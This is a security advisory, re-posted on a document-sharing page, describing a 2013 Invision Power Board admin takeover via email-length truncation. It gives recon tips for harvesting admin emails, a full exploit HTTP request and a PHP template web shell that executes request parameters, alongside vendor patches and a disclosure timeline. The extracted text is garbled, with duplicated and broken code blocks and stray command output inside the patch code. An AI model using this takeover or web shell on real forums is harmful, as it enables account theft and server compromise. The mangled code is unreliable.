How To Escalate IPB Admin

IPB (Invision Power Board) all versions (1.x? / 2.x / 3.
x) Admin account Takeove

r leading to code execution
Written on : 2013/05/02
Released on : 2013/05/13
Author: John JEAN / @johnjean on twitter)
Affected application: Invision Power Board <= 3.4.4
Type of vulnerability: Logical Vulnerability / Bad Sanitization
Required informations : Administrator's email
Evaluated Risk : Critical
Solution Status : A patch has been released which fixes these vulnerabilities
References : http://www.john-jean.com/blog/securite-informatique/ipb-invision-po
wer-board-all-versions-1-x-2-x-3-x-admin-account-takeover-leading-to-code-execut
ion-742
1
2
3
4
5
6
7
8
9
Written on : 2013/05/02
Released on : 2013/05/13
Author: John JEAN / @johnjean on twitter)
Affected application: Invision Power Board <= 3.4.4
Type of vulnerability: Logical Vulnerability / Bad Sanitization
Required informations : Administrator's email
Evaluated Risk : Critical
Solution Status : A patch has been released which fixes these vulnerabilities
References : http://www.john-jean.com/blog/securite-informatique/ipb-invision-po
wer-board-all-versions-1-x-2-x-3-x-admin-account-takeover-leading-to-code-execut
ion-742
[0] Application description & Deployment estimation
From wikipedia.org:
Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet foru
m software produced by Invision Power Services, Inc. It is written in PHP and pr
imarily uses MySQL as a database management system, although support for other d
atabase engines is available. While Invision Power Board is a commercially sold
product, there is a large modding community and many of these modifications are
free. In addition, many groups offer the download or design of free and paid ski
ns.
This software is deployed on very popular websites such as: NASA, EMI, NHL, NBC,
O Reilly, Evernote,
You can easily find tens of thousands of deployed instances using Google dorks s
uch as: inurl:index.php?app=core or powered by Invision Power Board .
[I] Logic Flaw
A) Overview
IPB harbors a sanitization flaw in its registration form and user control panel
(accessible once logged in). Incorrect e-mail address validation code allows an
attacker to take over the admin account without prompting any alert but preventi
ng the real admin to login afterwards. After a successful takeover, the attacker
can plant a PHP backdoor using IPB s templating system. Thorough administrators w
ill inspect total file system after they recover their hacked account, while oth
er administrators might assume they are dealing with a bug, receive their new pa
ssword using Password recovery system and leave the backdoor intact. Attacker may
also use the Retrieve password process to mislead the admin into thinking their ac
count was locked due to unsuccessful login attempts and not investigating furthe
r, thus preserving the backdoor.
B) Required data
1) Administrator s login name
The admin login is easily found by clicking on The moderating Team link on recent
IPB s footer, or using the URL below: index.php?app=forums&module=extras&section=s
tats&do=leaders
2) Administrator s e-mail
Obtaining the admin e-mail may be more complicated as there is no automated way
to get it. The attacker can get it through:
using whois on domain.tld to get registrar informations
looking up a prospective e-mail on Facebook and see if a matching profile shows
up
using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum,
etc comments based on user e-mail address). Attacker can create a script to ret
rieve an email based on an avatar. For example mine is: http://www.john-jean.com
/gravapwnd.php?zboob=john@wargan.com
do sourcing using FB, G+, Twitter, Google SERP,
use SE methods, such as faked e-mail catcher; or use XSSs on known websites cons
ulted by the target.
C) Explanation
This vulnerability is grounded on both a mistake in MySQL knowledge and bad sani
tization of the $email variable.
First of all, let s summarize how MySQL works:
Truncating while INSERT
During an INSERT query, if the string exceeds the field size defined when creati
ng the table, the string will be truncated. E.g.:
CREATE TABLE `test` (
`limitvarchar` varchar(5) NOT NULL
);
--INSERT INTO `test` (`limitvarchar`) VALUES ('123456789');
--SELECT * FROM `test`
> 12345
1
2
3
4
5
6
7
8
CREATE TABLE `test` (
`limitvarchar` varchar(5) NOT NULL
);
--INSERT INTO `test` (`limitvarchar`) VALUES ('123456789');
--SELECT * FROM `test`
> 12345
However, the string is not truncated during SELECT queries. The following query
will not return any result:
SELECT * FROM `test` WHERE `limitvarchar` = "123456"
1
SELECT * FROM `test` WHERE `limitvarchar` = "123456"
MySQL use permissive SELECT:
SELECT ignores spaces at the end of strings. Let s INSERT some datas:
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1
');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1');
1
2
3
4
5
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1
');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1');
Thus the following query will yield the 5 records inserted before:
SELECT * FROM `test` WHERE limitvarchar='1
'
1
SELECT * FROM `test` WHERE limitvarchar='1
'
Now, let s have a look at the checkEmailAddress function of admin/source/base/core
.php:
/**
* Check email address to see if it seems valid
*
* @param string Email address
* @return boolean
* @since 2.0
*/
static public function checkEmailAddress( $email = "" )
{
$email = trim($email);
$email = str_replace( " ", "", $email );
//----------------------------------------// Check for more than 1 @ symbol

//----------------------------------------if ( substr_count( $email, '@' ) > 1 )
{
return FALSE;
}
if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\{\}\[\]\?\\/\s\,]#', $email ) )
{
return FALSE;
}
/* tld increased to 32 characters as per RFC - http://community.invisionpower.co
m/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match-new-201
3-tlds-r41518 */
else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9]{1,4})(
\]?)$/', $email) )
{
return TRUE;
}
else
{
return FALSE;
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/**
*
* @param string Email address
* @return boolean
* @since 2.0
*/
{
$email = trim($email);
{
return FALSE;
}
if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\{\}\[\]\?\\/\s\,]#', $email ) )
{
return FALSE;
}
/* tld increased to 32 characters as per RFC - http://community.invisionpower.co
m/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match-new-201
3-tlds-r41518 */
else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9]{1,4})(
\]?)$/', $email) )
{
return TRUE;
}
else
{
return FALSE;
}
}
As you may know, trim only removes whitespace (and some others) characters BEFOR
E and AFTER the string, that is why IPB core team also use str_replace to remove
space chars IN the email string. However, this treatment is performed to change
the email address to the correct format. This is done to ensure the next steps
of the check, but there will be no condition returning false if string has been
trim or if str_replace has been used. This function checks an email validity for
mat used in the register form and the change email form.
Let s take a look at a another function called load( $member_key, $extra_tables= all ,
$key_type= ) in admin/sources/base/ipsMember.php
static public function load( $member_key, $extra_tables='all', $key_type='' )
{
//----------------------------------------// INIT
//----------------------------------------$member_value
= 0;
$members
=
$multiple_ids
=
$member_field
=
$joins
=
$tables
=
'groups' => 0, 'sessions'
$remap
=
array();
array();
'';
array();
array( 'pfields_content' => 0, 'profile_portal' => 0,
=> 0, 'members_partial' => 0 );
array( 'extendedProfile'
=> 'profile_portal',
'customFields'
=> 'pfields_content');
//----------------------------------------// ID or email?
//----------------------------------------if ( ! $key_type )
{
if ( is_array( $member_key ) )
{
$multiple_ids = array_map( 'intval', $member_key ); // Bug #2090
8
$member_field = 'member_id';
}
else
{
if ( strstr( $member_key, '@' ) )
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( strtolo
wer( $member_key ) ) . "'";
$member_field = 'email';
}
else
{
$member_value = intval( $member_key );
}
}
}
[...]
case 'email':
{
array_walk( $member_key, create_function( '&$v,$k', '$v=
"\'".ipsRegistry::DB()->addSlashes( strtolower( $v ) ) . "\'";' ) );
$multiple_ids = $member_key;
}
else
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( str
tolower( $member_key ) ) . "'";
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
static public function load( $member_key, $extra_tables='all', $key_type='' )
{
//----------------------------------------// INIT
//----------------------------------------$member_value
= 0;
$members
=
$multiple_ids
=
$member_field
=
$joins
=
$tables
=
'groups' => 0, 'sessions'
array();
array();
'';
array();
array( 'pfields_content' => 0, 'profile_portal' => 0,
=> 0, 'members_partial' => 0 );
$remap
= array( 'extendedProfile'
'customFields'
=> 'profile_portal',
=> 'pfields_content');
//----------------------------------------// ID or email?
//----------------------------------------if ( ! $key_type )
{
{
$multiple_ids = array_map( 'intval', $member_key ); // Bug #2090
8
}
else
{
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( strtolo
wer( $member_key ) ) . "'";
}
else
{
$member_value = intval( $member_key );
}
}
}
[...]
case 'email':
{
array_walk( $member_key, create_function( '&$v,$k', '$v=
"\'".ipsRegistry::DB()->addSlashes( strtolower( $v ) ) . "\'";' ) );
}
else
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( str
tolower( $member_key ) ) . "'";
}
As you can see, this function does not perform any verification on the length of
$member_key & $v. We will exploit that in the next part.
D) Exploitation
Previously, on this adviso: we saw that $email is not rejected if it contains sp
urious whitespace, and that $member_key & $v length is not checked. We also saw
some MySQL use-cases. Let s see how we can exploit that:
The e-mail field from the members table in IPB is declared as a varchar(150).
Upon registration, we fill the mail member (or admin) for which we want to steal
the account to which we add a padding space for the size of the string exceeds
150. Then we add any character after the space one. It is necessary to bypass aj
ax s validator, feel free to use Burp Suite or Tamperdata.
For example (scroll to right):

Real administrator's email: 'admin@admin.com'
Attacker's mail fill: 'admin@admin.com
AAAA' <- ends here
1
2
Real administrator's email: 'admin@admin.com'
Attacker's mail fill: 'admin@admin.com
AAAA' <- ends here
The SELECT query checking existing e-mails will not yield any result (scroll rig
ht):
SELECT * FROM members WHERE email='admin@admin.com
AAAA' <- ends here
1
SELECT * FROM members WHERE email='admin@admin.com
AAAA' <- ends here
The new account is successfully created. Our account is now using the e-mail add
ress below (scroll right):
'admin@admin.com
'
1
'admin@admin.com
'
AAAA has been deleted by MySQL: string exceeding 150 characters are truncated.
At this stage, we have two users with very similar e-mail addresses (scroll righ
t):
Administrator is: 'admin@admin.com'
Attacker is: 'admin@admin.com
' <- ends here
1
2
Administrator is: 'admin@admin.com'
Attacker is: 'admin@admin.com
' <- ends here
POST HTTP request looks like (on registration page):
POST /~codereview/IPB/index.php?app=core&module=globalion=register HTTP/1.1
Host: gfy.wargan.com
User-Agent: Wargan/1.0 (WarganOS; Amstrad; rv:1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gfx.wargan.com/~codereview/IPB/index.php?app=core&module=globalio
n=register
Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_

0000000000=1; coppa=0; rteStatus=rte
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 466
termsread=1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offs
et=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com
A&PassWord=pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_V
uvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOm
EG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&re
captcha_response_field=mmotlyiinducted&agree_tos=1
1
2
3
4
5
6
7
8
9
10
11
12
13
POST /~codereview/IPB/index.php?app=core&module=globalion=register HTTP/1.1
Host: gfy.wargan.com
User-Agent: Wargan/1.0 (WarganOS; Amstrad; rv:1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gfx.wargan.com/~codereview/IPB/index.php?app=core&module=globalio
n=register
Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_
0000000000=1; coppa=0; rteStatus=rte
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 466
termsread=1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offs
et=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com
A&PassWord=pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_V
uvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOm
EG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&re
captcha_response_field=mmotlyiinducted&agree_tos=1
We now can change our password. The profile corresponding to our session s e-mail
will be used. As already stated, spaces are not taken in consideration. The quer
y will thus actually return the first matching e-mail result: the real administr
ator account. We will have actually changed the password of the administrator pr
ofile.
This flaw is usable both on the registration page and on the user control panel
(index.php?app=core&module=usercp&tab=core&area=email).
E) Backdooring
Once the attacker has got access to the administrator s backend, all he needs to d
o is go to /admin/index.php?adsess=000&app=core&module=templates&section=templat
es&do=list&setID=1 and add some code to the defaultHeader template:
<php>
if(isset($_REQUEST['pwnd']))
{
$pwnd=$_REQUEST['pwnd'];
echo `$pwnd`;
}
</php>
1
2
3
4
5
6
7
8
<php>
if(isset($_REQUEST['pwnd']))
{
$pwnd=$_REQUEST['pwnd'];
echo `$pwnd`;
}
</php>
<php> & </php> markups are used by the IPB s templating system to add inline PHP c
ode. characters in PHP are used to do system calls.
Once such a backdoor has been planted, any part of public_html can be compromise
d and it may also lead to privilege escalation on a dedicated server or LAN.
index.php?lolz=ls%20/
returns:
bin boot build dev etc home initrd.img initrd.img.old
onexistent opt proc root run sbin selinux srv sys tmp
d
1
2
3
index.php?lolz=ls%20/
returns:
bin boot build dev etc home initrd.img initrd.img.old
onexistent opt proc root run sbin selinux srv sys tmp
d
[II] Mitigation
A) Patch party !
These are two quick & dirty patches, but they work.
admin/source/base/core.php should be:
/**
*
* @param string
Email address
* @return boolean
* @since 2.0
*/
lib lost+found media mnt n

usr var vmlinuz vmlinuz.ol
lib lost+found media mnt n

usr var vmlinuz vmlinuz.ol

{
if (strlen($email) > 150) return FALSE;
email = trim($email);
{
return FALSE;
}
if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\{\}\[\]\?\\/\s\,]#', $email )
)
{
return FALSE;
}
/* tld increased to 32 characters as per RFC - http://community.invision
power.com/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match
-new-2013-tlds-r41518*/
else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9
]{1,4})(\]?)$/', $email) )
{
return TRUE;
}
else
{
return FALSE;
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/**
*
* @param string
Email address
* @return boolean
* @since 2.0
*/
{
if (strlen($email) > 150) return FALSE;
email = trim($email);
{
return FALSE;
}
if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\{\}\[\]\?\\/\s\,]#', $email )
)
{
return FALSE;
}
/* tld increased to 32 characters as per RFC - http://community.invision
power.com/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match
-new-2013-tlds-r41518*/
else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9
]{1,4})(\]?)$/', $email) )
{
return TRUE;
}
else
{
return FALSE;
}
}
Enforces the e-mail variable to be shorter than 150 characters.
admin/source/base/ipsMember.php should be:

{
$member_value = "'" . ipsRegistry::DB()->addSlashes( strtolower( substr($mem
ber_key,0,140) ) ) . "'";
}
[...]
{
array_walk( $member_key, create_function( '&$v,$k', '$v="\'".ipsRegistry::DB
()->addSlashes( strtolower( substr($v,0,140) ) ) . "\'";' ) );
}
else
{
ber_key,0,140) ) ) . "'";
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
ber_key,0,140) ) ) . "'";
}
[...]
{
array_walk( $member_key, create_function( '&$v,$k', '$v="\'".ipsRegistry::DB
()->addSlashes( strtolower( substr($v,0,140) ) ) . "\'";' ) );
}
else
{
ber_key,0,140) ) ) . "'";
}
This will truncate the string to 140 characters.

Patching 1st or 2nd file fixes the bug.
B) Common sense
Never use a known email-adress for your application deployment, monitoring, supe
rvision,
You may use catch-all, or even better, another domain.tld than your own
.
Never deploy applications you do not completely trust (no one ?) or you did not
code review on shared hosting with other projects or applications that are not o
n that same network. Especially forums that expose a wide attack surface to mali
cious users.
Use mitigation systems such as IDS (which can be evaded depending on your attack
er skills).
Blacklist dangerous php functions (using http://www.hardened-php.net/suhosin/con
figuration.html#suhosin.executor.func.blacklist ?)
php_admin_value open_basedir /home/ipb/:/usr/share/php/
php_admin_value suhosin.executor.func.blacklist exec,dl,fpassthru,move_uploaded_
file,phpinfo,passthru,shell_exec,system,proc_open,popen,curl,
curl_exec,curl_multi_exec,parse_ini_file,show_source,
Use a chrooted environment
[III] Recommendations
The vendor has released a patch which fixes these vulnerabilities. It is strongl
y recommended to upgrade your software version: http://community.invisionpower.c
om/topic/385207-ipboard-32x-33x-and-34x-critical-security-update/
[IV] Timeline
2013/05/02: Advisory sent to IPB
2013/05/02: IPB responded
2013/05/03: Patch has been released
2013/05/03: IPB asked to wait at least a week before publishing advisory to prot
ect their huge community
2013/05/13: Advisory is released
1
2
3
4
5
2013/05/02: Advisory sent to IPB
2013/05/02: IPB responded
2013/05/03: Patch has been released
2013/05/03: IPB asked to wait at least a week before publishing advisory to prot
ect their huge community
2013/05/13: Advisory is released
[V] Author
John JEAN is a French security researcher working at Wargan Solutions
.wargan.com
Follow him on twitter @johnjean
[VI] PGP
-----BEGIN PGP PUBLIC KEY BLOCK-----
http://www
Version: GnuPG v1.4.9 (GNU/Linux)

mQGiBEo1REYRBADDGgkQVv+iN+LzRFH3WiDX+S0iTPg60MzTifYpfbeKH+FwdN/J
/lujfR3TjielPEWVbYCnPJA/wHNNUACm6+qWoPx5SzjKq1BXMoGoUkO5DtXivboG
NugVyKOBh7OARWilOkP6eB2zqbf/2ReHQtbX8a7xWyHzApyIAo/F2CiYOwCg7SyD
UQifs08r8Um3pmyLMxTVjncD/1BrpfSWgYJYFLPobHuRvtoEyhK9ONuNWgQKYHQm
mpoM6nxNVijySPpgyuyeDcyxgOzLJ3QI9Mqx+tmr1uLFZhAWSe0K5uz64pQ9PUMF
LTvN5uN3sVAER4kA1Jxs5foTIkrCA6eQqmypIfo/egX1W1Y/1uC0aB0/kG11rQO0
fgUwA/4qubdS0PcnPZUQYVJUe6rDx5r2U/WVD+sHFY+ILFnVzdrxEdr1md35e9P5
ovuMfUunIwKH8BjSG3fXXESTZuZXfFlqwrR+m1y5qUcXwr9wnffRP2iQxIaQi5+b
D4dR1J+oiNlPlVL8FuKK1dKHjIN9u4tjlE/VWCxoUyo97320z7QtSm9obiBKRUFO
IChHZWVrIFdvcmthaG9saWMpIDxKb2huQHdhcmdhbi5jb20+iGAEExECACAFAko1
REYCGwMGCwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRBthXHBmOb+lvYJAJ9k30a7
lZx92PXQfNeoKocX5Uo3vACgtWuhqkDB1IvRMjMe49ng18Sp87y5Ag0ESjVERhAI
AM0fzE0z5enz37lGPPHZrgW+XYWHNLfoR0gJvpu0FkPj4udPYL6+RJLGocWeJQBb
UuEgcFdKJugxs3U9y/5iSFfM3e5+jOqPZCj6loP8nY9yarfVQHlZKqn6zseCT3D8
d1uTNJWnzb5LYnbFrETCyJbaENH8jzNQCGP3NCyIfXfn5Wag7HUh6Zi6njwl/2zx
saizuQ3Wv0PjiVuJ8QEPvOdN9crTwt/JB2xRd98st7S5oEHvP96MyOtWSUWEnLSG
fQhVyZC+aLLCOp8ggNkCAwOUGvPetJXVOLaPUJAoEwzDxXl43+GlKreqXH+W2GZT
0/n8W4p28Xrqv2G/SJa9sg8AAwUH/0GvW9eYRLaRDuAaBdlGX8jXsCnOvdMoioeg
Wq9HwIYr94/kW2wJ1QFnhuEU/0cwx9MVrMElW0Q14kyY3KVUWAVpUTbfUPmtD6lo
RO3EnoHDJoaak0yuw67Townpc9zRIBci3vUcUTh9SwUtv16b96DI92BRRu8XBaRU
13E33BWUkf6DebpYHmCmlwy3NelHfOtbzc2FBJ7Xt+hQnxd+07V2NgUNjMpCQrMD
oh8ulOLWvrGKm7SZhV0ubqTt85mM6j5tmw0dkMwsGhgnf0U12uMfEKxm3IjcU+uk
0757WvPQQcr/iFSjxXwroqIgZpSJ/L1c8cfXgZ5bf0syeFODxEGISQQYEQIACQUC
SjVERgIbDAAKCRBthXHBmOb+loxrAKDUB6CWC+kYIOaRmD9IvVfKosm9wgCeN4XV
3vIlH84xsRZ/rS/yfwggdDc=
=jCPh
-----END PGP PUBLIC KEY BLOCK----1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.9 (GNU/Linux)

mQGiBEo1REYRBADDGgkQVv+iN+LzRFH3WiDX+S0iTPg60MzTifYpfbeKH+FwdN/J
/lujfR3TjielPEWVbYCnPJA/wHNNUACm6+qWoPx5SzjKq1BXMoGoUkO5DtXivboG
NugVyKOBh7OARWilOkP6eB2zqbf/2ReHQtbX8a7xWyHzApyIAo/F2CiYOwCg7SyD
UQifs08r8Um3pmyLMxTVjncD/1BrpfSWgYJYFLPobHuRvtoEyhK9ONuNWgQKYHQm
mpoM6nxNVijySPpgyuyeDcyxgOzLJ3QI9Mqx+tmr1uLFZhAWSe0K5uz64pQ9PUMF
LTvN5uN3sVAER4kA1Jxs5foTIkrCA6eQqmypIfo/egX1W1Y/1uC0aB0/kG11rQO0
fgUwA/4qubdS0PcnPZUQYVJUe6rDx5r2U/WVD+sHFY+ILFnVzdrxEdr1md35e9P5
ovuMfUunIwKH8BjSG3fXXESTZuZXfFlqwrR+m1y5qUcXwr9wnffRP2iQxIaQi5+b
D4dR1J+oiNlPlVL8FuKK1dKHjIN9u4tjlE/VWCxoUyo97320z7QtSm9obiBKRUFO
IChHZWVrIFdvcmthaG9saWMpIDxKb2huQHdhcmdhbi5jb20+iGAEExECACAFAko1
REYCGwMGCwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRBthXHBmOb+lvYJAJ9k30a7
lZx92PXQfNeoKocX5Uo3vACgtWuhqkDB1IvRMjMe49ng18Sp87y5Ag0ESjVERhAI
AM0fzE0z5enz37lGPPHZrgW+XYWHNLfoR0gJvpu0FkPj4udPYL6+RJLGocWeJQBb
UuEgcFdKJugxs3U9y/5iSFfM3e5+jOqPZCj6loP8nY9yarfVQHlZKqn6zseCT3D8
d1uTNJWnzb5LYnbFrETCyJbaENH8jzNQCGP3NCyIfXfn5Wag7HUh6Zi6njwl/2zx
saizuQ3Wv0PjiVuJ8QEPvOdN9crTwt/JB2xRd98st7S5oEHvP96MyOtWSUWEnLSG
fQhVyZC+aLLCOp8ggNkCAwOUGvPetJXVOLaPUJAoEwzDxXl43+GlKreqXH+W2GZT
0/n8W4p28Xrqv2G/SJa9sg8AAwUH/0GvW9eYRLaRDuAaBdlGX8jXsCnOvdMoioeg
Wq9HwIYr94/kW2wJ1QFnhuEU/0cwx9MVrMElW0Q14kyY3KVUWAVpUTbfUPmtD6lo
RO3EnoHDJoaak0yuw67Townpc9zRIBci3vUcUTh9SwUtv16b96DI92BRRu8XBaRU
13E33BWUkf6DebpYHmCmlwy3NelHfOtbzc2FBJ7Xt+hQnxd+07V2NgUNjMpCQrMD
oh8ulOLWvrGKm7SZhV0ubqTt85mM6j5tmw0dkMwsGhgnf0U12uMfEKxm3IjcU+uk
0757WvPQQcr/iFSjxXwroqIgZpSJ/L1c8cfXgZ5bf0syeFODxEGISQQYEQIACQUC
SjVERgIbDAAKCRBthXHBmOb+loxrAKDUB6CWC+kYIOaRmD9IvVfKosm9wgCeN4XV
3vIlH84xsRZ/rS/yfwggdDc=
=jCPh
-----END PGP PUBLIC KEY BLOCK-----

How To Escalate IPB Admin

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

How To Escalate IPB Admin

Hochgeladen von

Copyright:

Verfügbare Formate

IPB (Invision Power Board) all versions (1.x? / 2.x / 3.

x) Admin account Takeove

//----------------------------------------// Check for more than 1 @ symbol

For example (scroll to right):

Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_

lib lost+found media mnt n

lib lost+found media mnt n

static public function checkEmailAddress( $email = "" )

if ( strstr( $member_key, '@' ) )

This will truncate the string to 140 characters.

Version: GnuPG v1.4.9 (GNU/Linux)

Version: GnuPG v1.4.9 (GNU/Linux)

Das könnte Ihnen auch gefallen